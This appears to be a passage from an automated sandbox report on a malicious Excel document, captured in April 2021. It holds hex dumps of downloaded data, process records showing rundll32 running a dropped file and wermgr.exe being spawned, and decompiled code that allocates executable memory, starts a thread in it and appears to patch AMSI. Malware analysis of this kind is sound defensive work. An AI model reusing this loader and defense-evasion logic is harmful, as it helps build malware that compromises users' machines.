                        Data Raw: 31 66 61 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 72 7f 60 53 d5 dd f7 49 72 9b 5e da 94 dc 62 a3 55 aa d6 c7 b8 e1 40 45 83 0a 6f c1 55 ed 2d 6c 23 78 af 91 04 84 b6 fa 08 31 de b9 0d 35 17 70 52 2c 0b d5 de 1d e2 d8 86 cf dc 04 05 c5 4d 37 37 9d 43 ed 36 27 a1 ed 5a 3a 19 a2 22 14 01 ad 5a f5 60 a3 06 a9 50 34 70 de ef b9 37 c9 4d 42 da 3d ef df af 85 dc 7b ee f9 7e 3e df 1f 9f ef c7 7b e3 5a 64 43 08 71 f0 a3 14 a1 76 64 fc d5 a2 ff fc 37 0c bf b1 e7 fe 6d 2c da 32 e6 df e7 b5 5b 66 ff fb bc 1b 42 b7 dd 55 bd e4 ce 1f dd 7a e7 cd 3f a8 be e5 e6 1f fe f0 47 e1 ea ff 5e 5c 7d a7 fa c3 ea db 7e 58 5d 77 9d af fa 07 3f 5a b4 f8 e2 b2 b2 12 77 2a c7 c9 eb ba e7 fc ed e2 27 cf 4e ff e2 97 fe fd ec 47 53 e7 07 e1 d7 07 df 4f e9 df 4f 9d 7d db 25 4f 9e 3d ed b2 df 9e bd 09 be af bf f4 b1 b3 cf d3 df 8f 9f 3d 11 de d6 09 7f 3a fb ef fa f7 d3 c6 fb b6 5b 42 2c c7 48 bd 4b 22 42 b3 2d 76 f4 cb ef dd 7e 53 fa ae 1f 8d 3d af 14 ee 50 0b a8 51 6b d7 ef ae 9a 6a 41 48 80 c3 5a a6 10 9c 04 fd a9 eb 85 90 f9 46 bb 4a 0c 1c fc 59 91 01 35 be 85 cc 3d 7b d5 de 5c 84 7c fa 97 1d 71 16 a4 d7 79 52 c8 64 31 ff 6e 2a 41 8b 1a 8d ba 55 ff 8b 5d a4 ff 2a c6 d8 91 c0 8f 1c bf 38 bc 78 79 18 de 57 a8 9c d1 50 0b 97 e9 2f fd 57 0d d5 2f be 73 d1 cd e1 9b 11 fa e5 6b 46 0f 20 4e 5a 83 cc 5f 2d fc bf d8 80 a1 27 57 c3 63 49 91 61 1c f6 ce c5 c5 2e be cd 00 56 5e ca 6e ec 06 ee d9 02 b8 3b ef ba f3 16 96 4f 48 ed a0 1a de 89 53 70 b5 17 df b9 f8 f6 1f 01 f0 e2 c5 48 d7 0a 2d 81 b7 50 92 8f bb 66 64 25 be fe fb fa ef eb bf af ff be fe fb fa ef eb bf af ff be fe fb fa ef eb bf af ff fe ff fa 6b ff 4b 13 27 90 1b ab 2d 48 96 37 ad 59 59 24 44 16 c7 91 5f 13 13 8a 25 2a 26 1a 25 85 57 90 a6 26 c9 be a9 1c c2 5e 1e ee 24 72 d1 56 2b dc c5 5b 16 27 51 d4 9b 20 4f 6d b3 42 68 08 8b 7c e3 22 ad 8c 25 ed ed e0 10 0d bb 39 46 96 c9 df 80 1a e9 12 e0 6e 2e 8e cb 72 54 1c 96 14 bb 62 25 f7 b1 94 22 8f bd c3 1a 3c 92 da 2c 2e c3 83 b0 4c 7e 92 c3 8b 8a 49 49 29 55 6c e4 3a 9d 96 ec ed d4 91 70 23 93 79 85 90 1c b9 20 0f c9 c9 e4 e2 42 c8 22 f2 d5 95 b9 c8 22 99 70 85 90 76 f2 5a 1e d2 2e 93 b7 ae cc 45 9e 94 14 ab 52 4c 7e 07 d7 41 2c 9e ec ed 74 6e ad 73 73 fa a5 4c fe 58 08 cc 93 1f 9f 0a e6 65 d2 92 01 b7 f7 b2 35 fd e5 1c 58 93 5f 99 4e 7e c5 db 10 4e cc d7 d4 84 27 56 93 d0 c4 64 d8 89 77 92 77 7a ac a8 c7 3e 75 2d 27 e0 6e 58 48 66 1b 9d 50 ca 13 93 24 89 aa 55 54 ad a4 6a 05 55 05 aa 3a 42 09 80 92 f5 21 84 1a 3a aa 90 1f 1f 26 15 00 3f 5a e7 e6 2d e1 62 3f 59 00 45 e6 e3 ee 46 28 7f a8 e9 75 2b 6a af 06 78 67 4a 0d 05 31 3d ac 8a 45 26 37 58 6c 4c 92 48 57 a5 a1 4a a8 fa 8e 22 41 41 f0 8f 63 e1 cb 21 1c e9 aa 32 85 4c 53 61 c5 67 e6 53 dd 26 15 c2 5f a2 02 54 1b 50 61 e7 6f a3 3c ea 04 93 0a e1 ad 79 d4 93 8c 0a 35 99 09 1e 87 18 13 5b e7 1a 7a 87 26 99 6c 40 ac 1a 89 0d c6 58 5c 80 3d d9 64 03 e2 da 0c bb fd 08 5b 5b b2 0a d6 26 6f 5a b3 b2 48 88 2c 8e 23 bf 26 26 14 4b 54 4c 34 b2 ac 3c 64 b5 cb 9a 9a 24 0e 36 91 97 87 bc 10 93 48 cf df ad 48 53 e3 2d 8b 93 28 ea 4d 90 6b 5f b6 42 74 08 8b 7c 66 af 50 40 9f 7c 8a 59 1d
                        Data Ascii: 1faar`SIr^bU@EoU-l#x15pR,M77C6'Z:"Z`P4p7MB={~>{ZdCqvd7m,2[fBUz?G^\}~X]w?Zw*'NGSOO}%O==:[B,HK"B-v~S=PQkjAHZFJY5={\|qyRd1n*AU]*8xyWP/W/skF NZ_-'WcIa.V^n;OHSpH-Pfd%kK'-H7YY$D_%*&%W&^$rV+['Q OmBh|"%9Fn.rTb%"<,.L~II)Ul:p#y B""pvZ.ERL~A,tnssLXe5X_N~N'Vdwwz>u-'nXHfP$UTjU:B!:&?Z-b?YEF(u+jxgJ1=E&7XlLHWJ"AAc!2LSagS&_TPao<y5[z&l@X\=d[[&oZH,#&&KTL4<d$6HHS-(Mk_Bt|fP@|Y
                        Apr 7, 2021 00:40:05.259294033 CEST3INData Raw: ec f8 4f 6a 2d dc 3b b8 ef 29 88 e5 f7 3e d5 64 03 e2 fe 91 d8 60 c7 ef 17 60 4f 37 d9 80 f8 4e 86 dd 7e ee 4d 30 b9 f5 3f 4d 3e 46 9f 7c 1c b5 66 4f fe ef bf e5 4c fe 9d 7f 8c 38 79 ad 59 7d 8c 4c 5e 39 99 a9 fe 3d 56 7d f5 f8 ff 50 bd 44 af be
                        Data Ascii: Oj-;)>d``O7N~M0?M>F|fOL8yY}L^9=V}PDdNr%2yL.e%:BxDwSEm2`K&a/c]wm.ZkhE>V&#I2yjL6 JdrB#eR}Dcm'ky^dR!|~!
                        Apr 7, 2021 00:40:05.259332895 CEST4INData Raw: db 36 6d 6e a2 95 62 a9 5a 6b 26 4b 97 80 e4 b6 d7 b4 b9 c3 d1 8a b1 3f 2d 6e 13 4b 9d 2f 5a b1 9a 88 2c 4e a2 e8 94 fb b0 38 6c 3b 8c 91 6d 5b 4b 73 29 0a bb 71 df c4 06 10 34 3e 68 c3 0d f1 9f 56 d5 ac de 1f 2e 9b 7a ae 3a 86 8a c9 99 2d df 46
                        Data Ascii: 6mnbZk&K?-nK/Z,N8l;m[Ks)q4>hV.z:-F!H-kjonCJ*EaC\S#;7zm}:uR4S+<C(\$t1!IaQn-cQn1v[bu^-v-yWnGn_pJScn[]n5
                        Apr 7, 2021 00:40:05.259372950 CEST6INData Raw: cc 5a c4 a5 9f 77 30 4f 91 31 fa 79 80 99 89 9c a8 64 e7 03 cc 45 e4 30 3b 8b 71 fc 8a a4 5b c7 f2 39 a5 92 11 2b 26 a7 eb 9c b8 1e b8 e2 2c 0e 29 cc c0 13 3f 85 ba 3a 81 dc 79 58 07 ef 06 00 4f 0e 55 9a e0 31 67 e9 49 21 24 91 81 cb 40 7b 68 10
                        Data Ascii: Zw0O1ydE0;q[9+&,)?:yXOU1gI!$@{hcHWh+v[DPB?f*gD<^J,ZL.b9(ylb"sL229wIxE"S-B:nb5%3)K_@J"+Jg3LWN~I'&-K7%
                        Apr 7, 2021 00:40:05.259413004 CEST7INData Raw: b2 34 f2 4e 13 39 96 8c 31 91 ff 4c 21 43 19 e4 2c 13 e9 24 ef 6c cc 20 1f 4e 23 33 d5 cf 31 91 02 79 de 44 de 91 42 ce cb 20 87 36 65 90 e5 04 9b c8 99 29 e4 a4 4c f5 7f 01 12 50 e3 18 9a dc 6c 22 cf 4e 21 13 4b d3 c8 8d 66 ce d3 c8 95 26 f2 c8
                        Data Ascii: 4N91L!C,$l N#31yDB 6e)LPl"N!Kf&#r e&P`C2aviw>>fAsm~8,[LZz-,5mq:y-<-.*JE&=e3d<wxd55.XA~^HC!kj"83=QwbvxM
                        Apr 7, 2021 00:40:05.259459972 CEST9INData Raw: d7 72 42 8f 3d b6 8e 13 70 77 53 63 ba 8b 54 ad 5b 07 29 cd d4 5a 68 d6 8a 6c 5b 28 87 88 0d dc 1e 76 3b 48 a5 64 43 6c c2 36 48 d2 d9 fe 24 eb e0 2c e8 20 12 af f5 07 f0 71 82 3f b7 a2 e8 b2 85 ca 18 bc 93 dc b2 87 d2 a8 f7 00 e9 29 e2 8c 66 bc
                        Data Ascii: rB=pwScT[)Zhl[(v;HdCl6H$, q?)f]pzwtIyF?<p_8s)gymJ%#f'.;[PT'>b?nBH"+K@gIch%hg=8e- dK!zN6Y)}d3;b9(-EVJK
                        Apr 7, 2021 00:40:05.259501934 CEST9INData Raw: a7 cd d7 4f 8e c0 86 be 5e 28 c0 5e 92 b3 ca 75 23 b1 61 57 cb 0b b0 c3 39 db f4 67 d8 2c cc 4b c6 33 b4 3c 67 8f 97 9e 34 74 e4 73 41 2b 4c 90 5d 26 8e c2 a0 16 13 54 2c 93 8f 4e 14 04 ad 36 41 bc 4c 3a 0a 83 da 4c d0 18 d8 7f 61 d0 1a 13 54 02
                        Data Ascii: O^(^u#aW9g,K3<g4tsA+L]&T,N6AL:LaT5A23A\yb$eL/+ueg!3X|4<&dr8ef2y.Y&\&l*VLd`-&s3'7tT"v,C<kO!X %YG:Bq&uTAN 7
                        Apr 7, 2021 00:40:05.259541988 CEST10INData Raw: 31 66 61 30 0d 0a af 84 de 95 29 58 29 93 ba 2f 73 84 7e be 25 a7 da a5 05 aa 15 10 7a b7 29 34 a4 3c 7c 3c 2d 34 78 53 8e b0 54 62 52 41 92 32 06 4a 5a 64 f2 da f1 54 c9 4a c5 42 61 e0 b3 8e c0 b7 c8 f7 76 70 85 08 56 99 6c cc 23 1c fa 7c 34 82
                        Data Ascii: 1fa0)X)/s~%z)4<|<-4xSTbRA2JZdTJBavpVl#|4M&?#JdrU\BH&'&*w03IXb+^&L]g*K#pY}e{sVr+l0[5|W/]5ArJG%#'
                        Apr 7, 2021 00:40:05.259582996 CEST12INData Raw: b8 cd 10 2f 49 cc 45 b1 e8 3e 11 72 19 0b a9 64 29 c5 54 0d 31 55 54 74 18 15 96 43 05 b6 2e 0b 53 e7 45 92 5a d7 54 b6 ae 4a 82 de 4b ad ab 02 39 b7 c2 44 52 a8 c5 6c 08 d4 b8 9f 64 af df b9 55 74 b0 8a 52 54 74 84 56 a7 f2 5a 15 24 93 a6 74 de
                        Data Ascii: /IE>rd)T1UTtC.SEZTJK9DRldUtRTtVZ$t*A|7/beMwh[(,`krBREO]cGIu9_C*(W2LP)cf: nS`w}7]npd]S7rHTy9|Q$^
                        Apr 7, 2021 00:40:05.259625912 CEST13INData Raw: f5 1a ce e0 42 37 e4 b4 fb e2 9e 51 da 85 25 fc 6a 4f 6e bb fd af e6 98 39 8f 00 d2 07 f3 08 cf 8c 4a 28 92 c9 e5 79 84 95 b9 84 a8 78 92 81 61 6c c5 2e 13 1e c0 41 2c 9e 34 d5 9f 97 1e 87 57 78 99 90 37 47 19 07 e2 db df cc 2d 56 6e 16 f3 c4 24
                        Data Ascii: B7Q%jOn9J(yxal.A,4Wx7G-Vn$IR,JLTvff"8!xP3)g4vQZ0"3`> K<X+snR(dh&cqpAl_J}71)|Yo4.OC-l)
                        Apr 7, 2021 00:40:05.444904089 CEST15INData Raw: 14 09 ce 42 90 bc a7 7e f6 ba 0d 9c d0 53 2f 2d 67 2f fb 00 64 c4 dd e9 62 bd 1d 1c 82 9c a4 02 ce 47 eb dc bc 25 5c ec 27 fc 23 56 34 1f 30 10 6b b7 29 50 fa dd bf 30 bd 04 00 06 34 75 20 95 a3 7e 52 8f 98 84 a1 d1 b1 be f1 b1 d6 98 26 26 c2 b5
                        Data Ascii: B~S/-g/dbG%\'#V40k)P04u ~R&&Q1_M<!Kg#m[2zblQ@e.@j'$5}l$dM\gE:*+b2,N0M2muU)V[{9]bR kjT39pyml^yM


                        Code Manipulations

                        Statistics

                        CPU Usage

                        Click to jump to process

                        Memory Usage

                        Click to jump to process

                        High Level Behavior Distribution

                        Click to dive into process behavior distribution

                        Behavior

                        Click to jump to process

                        System Behavior

                        General

                        Start time:00:39:34
                        Start date:07/04/2021
                        Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        Wow64 process (32bit):false
                        Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                        Imagebase:0x13f160000
                        File size:27641504 bytes
                        MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        General

                        Start time:00:39:39
                        Start date:07/04/2021
                        Path:C:\Windows\System32\rundll32.exe
                        Wow64 process (32bit):false
                        Commandline:rundll32 ..\sdbybsd.fds,StartW
                        Imagebase:0xff230000
                        File size:45568 bytes
                        MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        General

                        Start time:00:39:39
                        Start date:07/04/2021
                        Path:C:\Windows\SysWOW64\rundll32.exe
                        Wow64 process (32bit):true
                        Commandline:rundll32 ..\sdbybsd.fds,StartW
                        Imagebase:0xfd0000
                        File size:44544 bytes
                        MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        General

                        Start time:00:39:40
                        Start date:07/04/2021
                        Path:C:\Windows\System32\wermgr.exe
                        Wow64 process (32bit):
                        Commandline:C:\Windows\system32\wermgr.exe
                        Imagebase:
                        File size:50688 bytes
                        MD5 hash:41DF7355A5A907E2C1D7804EC028965D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:moderate

                        Disassembly

                        Code Analysis

                        Reset < >

                          Executed Functions

                          APIs
                          • LoadLibraryW.KERNEL32(00244054), ref: 00241047
                          • GetProcAddress.KERNEL32(00000000), ref: 0024104E
                            • Part of subcall function 00241B30: SetLastError.KERNEL32(0000000D,?,00241070,?,00000040), ref: 00241B3D
                          • SetLastError.KERNEL32(000000C1), ref: 00241096
                          Memory Dump Source
                          • Source File: 00000004.00000002.2087375421.0000000000241000.00000020.00000001.sdmp, Offset: 00241000, based on PE: false
                          Similarity
                          • API ID: ErrorLast$AddressLibraryLoadProc
                          • String ID:
                          • API String ID: 1866314245-0
                          • Opcode ID: 07637e43516bf1de63f345bd383ba85b1bd9195376d08337f153cd9da501e338
                          • Instruction ID: f0a71b6a86b6b3cb4182bcaace31e0e44675b0fbc00002f7192256974c95f85c
                          • Opcode Fuzzy Hash: 07637e43516bf1de63f345bd383ba85b1bd9195376d08337f153cd9da501e338
                          • Instruction Fuzzy Hash: ECF1ECB4A10209EFDB08CF94D984AAEB7B1FF48304F208598E915AB351D775EEA1DF50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00811000() {
                          				_Unknown_base(*)()* _v8;
                          				void* _v12;
                          				struct tagMSG _v40;
                          				long _v44;
                          				struct HWND__* _v48;
                          				long _v52;
                          				void* _v56;
                          				void* _t38;
                          				void* _t43;
                          				int _t45;
                          
                          				SetTimer(0, 0, 0x25b, 0); // executed
                          				while(GetMessageW( &_v40, 0, 0, 0) != 0) {
                          					_v40.message = _v40.message + 1;
                          					if(_v40.message != 0x114) {
                          						DispatchMessageW( &_v40);
                          						continue;
                          					} else {
                          					}
                          					break;
                          				}
                          				_v12 = 0;
                          				_v48 = 0;
                          				_v52 = 0x5000;
                          				while(_v52 > 0x1000) {
                          					_v52 = _v52 - 1;
                          				}
                          				_v44 = _v52;
                          				while(_v44 > 0x40) {
                          					_v44 = _v44 - 1;
                          				}
                          				do {
                          					_t38 = VirtualAlloc(_v12, 0x43000, _v52, _v44); // executed
                          					_v8 = _t38;
                          					if(_v8 == 0) {
                          						Sleep(0x1f4);
                          					}
                          				} while (_v8 == 0);
                          				_v48 =  &(_v48->i);
                          				E00811140(_v48, _v8);
                          				_t43 = CreateThread(0, 0, _v8, 1, 0, 0); // executed
                          				_v56 = _t43;
                          				SetTimer(0, 0, 0x2000, 0); // executed
                          				while(1) {
                          					_t45 = GetMessageW( &_v40, 0, 0, 0);
                          					if(_t45 == 0) {
                          						break;
                          					}
                          					_v40.message = _v40.message + 1;
                          					if(_v40.message == 0x114) {
                          						return _t45;
                          					}
                          					DispatchMessageW( &_v40);
                          				}
                          				return _t45;
                          			}













                          0x00811011
                          0x00811017
                          0x00811031
                          0x0081103b
                          0x00811043
                          0x00000000
                          0x00000000
                          0x0081103d
                          0x00000000
                          0x0081103b
                          0x0081104b
                          0x00811052
                          0x00811059
                          0x00811060
                          0x0081106f
                          0x0081106f
                          0x00811077
                          0x0081107a
                          0x00811086
                          0x00811086
                          0x0081108b
                          0x0081109c
                          0x008110a2
                          0x008110a9
                          0x008110b0
                          0x008110b0
                          0x008110b6
                          0x008110c2
                          0x008110cd
                          0x008110e0
                          0x008110e6
                          0x008110f4
                          0x008110fa
                          0x00811104
                          0x0081110c
                          0x00000000
                          0x00000000
                          0x00811114
                          0x0081111e
                          0x00000000
                          0x00000000
                          0x00811126
                          0x00811126
                          0x00811131

                          APIs
                          • SetTimer.USER32(00000000,00000000,0000025B,00000000), ref: 00811011
                          • GetMessageW.USER32 ref: 00811021
                          • DispatchMessageW.USER32(?), ref: 00811043
                          • VirtualAlloc.KERNELBASE(00000000,00043000,00001000,00000040), ref: 0081109C
                          • Sleep.KERNEL32(000001F4), ref: 008110B0
                          • CreateThread.KERNELBASE(00000000,00000000,00000000,00000001,00000000,00000000), ref: 008110E0
                          • SetTimer.USER32(00000000,00000000,00002000,00000000), ref: 008110F4
                          • GetMessageW.USER32 ref: 00811104
                          • DispatchMessageW.USER32(?), ref: 00811126
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.2087448993.0000000000811000.00000020.00000001.sdmp, Offset: 00810000, based on PE: true
                          • Associated: 00000004.00000002.2087446726.0000000000810000.00000004.00000001.sdmp Download File
                          • Associated: 00000004.00000002.2087467207.0000000000844000.00000002.00000001.sdmp Download File
                          Similarity
                          • API ID: Message$DispatchTimer$AllocCreateSleepThreadVirtual
                          • String ID: @
                          • API String ID: 368155642-2766056989
                          • Opcode ID: 40b5a9544c73ccf50c9c7b7af56f6609937e481eab3f3f4c36635930ce9ed28d
                          • Instruction ID: 425eaf0113f406db818593dd3a1634be757811659172602c8acbcc06979aa087
                          • Opcode Fuzzy Hash: 40b5a9544c73ccf50c9c7b7af56f6609937e481eab3f3f4c36635930ce9ed28d
                          • Instruction Fuzzy Hash: 5D41D774E44608EBEF14DBA4DD89BDDBBB8FF48B05F205118E701BA180D7B5A980DB64
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetProcAddress.KERNEL32(?,?), ref: 009308AD
                          • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 009309BB
                          • CreateProcessInternalW.KERNEL32(?,00000000,?,00000000,00000000,00000000,0800000C,00000000,?,?,?), ref: 00930A7A
                          • Wow64DisableWow64FsRedirection.KERNEL32(?), ref: 00930D2B
                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,?,?), ref: 00930D61
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.2087475264.0000000000930000.00000040.00000001.sdmp, Offset: 00930000, based on PE: false
                          Similarity
                          • API ID: CreateProcessWow64$AddressDirectoryDisableInternalProcRedirectionSystem
                          • String ID: L!m>$L!m>
                          • API String ID: 2693396481-4066150234
                          • Opcode ID: 311e5dde5ce8757a85213ee2a9c6b43e3236c8ddb1e034d52d7caa76b9262ff5
                          • Instruction ID: 8f1c054a77d764430f6bf30677f895e6a5e4f78a0dd8f1370a17a9e60eb68ac4
                          • Opcode Fuzzy Hash: 311e5dde5ce8757a85213ee2a9c6b43e3236c8ddb1e034d52d7caa76b9262ff5
                          • Instruction Fuzzy Hash: 4AF18E78209341DFDB24CB18D8A4B2E77E6ABD9344F20485AF586CB7A0D675EC80DF52
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • SetLastError.KERNEL32(0000007F), ref: 002414DB
                          • SetLastError.KERNEL32(0000007F), ref: 00241507
                          Memory Dump Source
                          • Source File: 00000004.00000002.2087375421.0000000000241000.00000020.00000001.sdmp, Offset: 00241000, based on PE: false
                          Similarity
                          • API ID: ErrorLast
                          • String ID:
                          • API String ID: 1452528299-0
                          • Opcode ID: b47e767fa9d2097ce90edac46f2eabf8e8cfbca4c9e02446cf84f153304711fa
                          • Instruction ID: 349d00978329eb00a368700a516043b25f2f895cecdc5b68443c9ecbe2733d89
                          • Opcode Fuzzy Hash: b47e767fa9d2097ce90edac46f2eabf8e8cfbca4c9e02446cf84f153304711fa
                          • Instruction Fuzzy Hash: 2D71F774E20109DFCB08DF98D585AADB7B6FF48304F648598E416AB341D774EAA1CF90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • IsBadHugeReadPtr.KERNEL32(00000000,00000014), ref: 002421F9
                          • SetLastError.KERNEL32(0000007E), ref: 0024223B
                          Memory Dump Source
                          • Source File: 00000004.00000002.2087375421.0000000000241000.00000020.00000001.sdmp, Offset: 00241000, based on PE: false
                          Similarity
                          • API ID: ErrorHugeLastRead
                          • String ID:
                          • API String ID: 3239643929-0
                          • Opcode ID: ea5caee2763827ccec33a50daeccf6c6d6e08cae235cceeb183d4b6b74cad57f
                          • Instruction ID: 9d87e566a8921ce08a3fc32836d0d1b30ddf17578908055b9f6b5e49071f4fef
                          • Opcode Fuzzy Hash: ea5caee2763827ccec33a50daeccf6c6d6e08cae235cceeb183d4b6b74cad57f
                          • Instruction Fuzzy Hash: C181BA75A10209DFDB08CF95C894AADBBB1FF48314F648198E909AB351C774EE95CF90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetNativeSystemInfo.KERNEL32(?,?,?,?,001B0005), ref: 001B00E9
                          • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,001B0005), ref: 001B0111
                          Memory Dump Source
                          • Source File: 00000004.00000002.2087349800.00000000001B0000.00000040.00000001.sdmp, Offset: 001B0000, based on PE: false
                          Similarity
                          • API ID: AllocInfoNativeSystemVirtual
                          • String ID:
                          • API String ID: 2032221330-0
                          • Opcode ID: 460d81c489b0c162692d77f33f70033fe6d40d0b28a700ce4a73fb1871822586
                          • Instruction ID: 64228eb3abbae875944552a05de9028946c405a8fc249e09d2a588ea25488623
                          • Opcode Fuzzy Hash: 460d81c489b0c162692d77f33f70033fe6d40d0b28a700ce4a73fb1871822586
                          • Instruction Fuzzy Hash: 2BD1DE71A043068FDB29DF69C8847ABB3E0FF98308F18852DE995DB251E774E845CB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000004.00000002.2087375421.0000000000241000.00000020.00000001.sdmp, Offset: 00241000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6a470562c8ea793218b6a72e3383606ef69d27929cb1d11be036ea167050f1b2
                          • Instruction ID: 84ab0aa5368c467df31cd0631f8c446118d2652e2ca77e83d8e32eab6e74c88f
                          • Opcode Fuzzy Hash: 6a470562c8ea793218b6a72e3383606ef69d27929cb1d11be036ea167050f1b2
                          • Instruction Fuzzy Hash: C2419378A10109EFDB08DF44D494BAAB7B2FB88314F24C159E9195B355C775EEA2CB80
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • VirtualAlloc.KERNELBASE(00000000,00241A51,00003000,00000004,000000BE,?,00241A51,?), ref: 00241A01
                          Memory Dump Source
                          • Source File: 00000004.00000002.2087375421.0000000000241000.00000020.00000001.sdmp, Offset: 00241000, based on PE: false
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: a5bd183df2ada16a9fe5edb2bba15b2f156c42042b16a18c3340ed5ee93ceba1
                          • Instruction ID: da421c6be535552708e5d41c8774c2d222af419a39f5eda585fe83a39870c44d
                          • Opcode Fuzzy Hash: a5bd183df2ada16a9fe5edb2bba15b2f156c42042b16a18c3340ed5ee93ceba1
                          • Instruction Fuzzy Hash: EAD0C9B4645208BBEB10CB84DC06F69BBACD705611F004185FE089B280D5B2AE0056A1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • VirtualFree.KERNELBASE(?,?,?), ref: 0024182F
                          Memory Dump Source
                          • Source File: 00000004.00000002.2087375421.0000000000241000.00000020.00000001.sdmp, Offset: 00241000, based on PE: false
                          Similarity
                          • API ID: FreeVirtual
                          • String ID:
                          • API String ID: 1263568516-0
                          • Opcode ID: b515d5f3bf441177257a111eb091381e34984c45848e58734ab51e41c7c4b8b2
                          • Instruction ID: 84e2a87f7f303d5622399d4b64cf4e6222343896e09d73433cfab5302c0a8ce3
                          • Opcode Fuzzy Hash: b515d5f3bf441177257a111eb091381e34984c45848e58734ab51e41c7c4b8b2
                          • Instruction Fuzzy Hash: CDC04C7A11430CAB8B04DF98EC84DAB37ADBB8C610B048508BA1D87200C630F9108BA4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Non-executed Functions

                          Memory Dump Source
                          • Source File: 00000004.00000002.2087349800.00000000001B0000.00000040.00000001.sdmp, Offset: 001B0000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3dc4c1101507dda9be7d1ca017cc9ed333707a61feece7f86d76402a0b178a7c
                          • Instruction ID: 816c40d68ce49d04909c8798207b57f530b3a57122a8181c5d852d2e3a5c96eb
                          • Opcode Fuzzy Hash: 3dc4c1101507dda9be7d1ca017cc9ed333707a61feece7f86d76402a0b178a7c
                          • Instruction Fuzzy Hash: B4F1E7B4A01209EFDB04CF94C994AEEB7B5BF4C304F218598E906AB385D775EE41DB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000004.00000002.2087349800.00000000001B0000.00000040.00000001.sdmp, Offset: 001B0000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ded6229e3e23a4507086dc0077879e3907ca58c6aaa16bf319b008a2148b5087
                          • Instruction ID: ec429be480c5641c99449a66258b2f1e5066ba9df940bd11a914c141e849d315
                          • Opcode Fuzzy Hash: ded6229e3e23a4507086dc0077879e3907ca58c6aaa16bf319b008a2148b5087
                          • Instruction Fuzzy Hash: 6331A236A0474A8FC711DF18C48096BB7E4FF8D354F0649ADEA9587312E734F9468B91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • LoadLibraryExA.KERNEL32(00244070,00000000,00000800), ref: 002425F9
                          • GetProcAddress.KERNEL32(00000000,00244078), ref: 00242615
                          • VirtualProtect.KERNEL32(?,00000004,00000040,?), ref: 00242650
                          • VirtualProtect.KERNEL32(?,00000004,?,?), ref: 00242671
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.2087375421.0000000000241000.00000020.00000001.sdmp, Offset: 00241000, based on PE: false
                          Similarity
                          • API ID: ProtectVirtual$AddressLibraryLoadProc
                          • String ID: AMSI
                          • API String ID: 3300690313-3828877684
                          • Opcode ID: 46b49f6426cfe7ac97ab0017fbf905bde0340395dce72f79e4a241663f8eb2ed
                          • Instruction ID: c2cbc4b7bd5cac7339dafed005059ea2a313b7cac399286c59273a44151a2475
                          • Opcode Fuzzy Hash: 46b49f6426cfe7ac97ab0017fbf905bde0340395dce72f79e4a241663f8eb2ed
                          • Instruction Fuzzy Hash: C71107B4E11209EFCB08DF94D849BAEBBB8FB48304F614599E601AB380D7B06A54DF55
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • VirtualProtect.KERNEL32(?,00000040,00000004,?), ref: 00242468
                          • VirtualProtect.KERNEL32(00000000,000000F8,00000004,?), ref: 002424B2
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.2087375421.0000000000241000.00000020.00000001.sdmp, Offset: 00241000, based on PE: false
                          Similarity
                          • API ID: ProtectVirtual
                          • String ID: @
                          • API String ID: 544645111-2766056989
                          • Opcode ID: 45375e2fa0b7d64f43361bd9416e230fe418e6c333c0963af99e3cf591679ac9
                          • Instruction ID: 58753201a895efa4a9fd59ff8888f44ec498138999bf2866fc12fed273aeb27c
                          • Opcode Fuzzy Hash: 45375e2fa0b7d64f43361bd9416e230fe418e6c333c0963af99e3cf591679ac9
                          • Instruction Fuzzy Hash: 5C21E8B4A10209EFDF18CF99C984BAEBBB5FF44304F608199E905AB240C774AF94DB55
                          Uniqueness

                          Uniqueness Score: -1.00%